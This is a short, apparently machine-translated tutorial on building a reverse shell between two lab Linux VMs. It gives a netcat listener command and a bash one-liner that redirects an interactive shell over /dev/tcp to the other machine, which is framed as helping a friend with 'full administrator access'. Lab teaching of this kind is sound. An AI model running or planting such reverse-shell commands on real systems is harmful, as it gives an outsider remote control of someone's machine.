In this guide we are going to show you how to build a reverse shell between two Linux machines.
For this purpose we will use two VMs running linux, one will be Kali Linux and the other will be Backtrack Linux.
- For Kali Linux Machine IP - 192.168.179.137
- For Backtrack Linux Machine IP - 192.168.179.139
What is the Reverse Shell
Usually when you make any TCP / IP connection between two computers, then one server handles the connection and another the so-called client tries to make the connection.
Where you can use the Reverse Shell
Just think that you want to help a friend, but he does not have a server with port forward etc. and of course you can not connect to his machine. In this case you can use the Reverse Shell to receive with reverse TCP / IP a connection to your friend's machine, with full administrator access.
Do not think illegally, I do not want bullshit
Now we are going to use Netcat on the server side, that is, on the BT Machine. Netcat is a free network utility used to read / write TCP and UDP sockets.
Step 1: Your first step is to put your machine into listening mode using the following command:
Mandate: nc -l -vv -p 1337
Here, -l means listening function, -vv means function verbose and -p shows us the port used for the server.
Once you run the command on your machine (BT), you should see the following:
Step 2: Now go to the client machine, ie the Kali Linux Machine that you want to control from your terminal. Here we are going to redirect the standard i / o / e of the bash client to the server using the bash command:
Mandate: bash -i &> /dev/tcp/192.168.179.139/1337 0> & 1
Here is the bash -i shows us that the Interactive bash, &> / dev / tcp / / stand redirects the standard output and bash error to the server, and that 0> & 1 means connecting the standard bash input to the output.
Here both machines are connected to the same network via NAT, so we will use our local IP.
Once you or your friend execute the above command on your machine, you will be connected to it and you will be able to fully control it, through the shell terminal.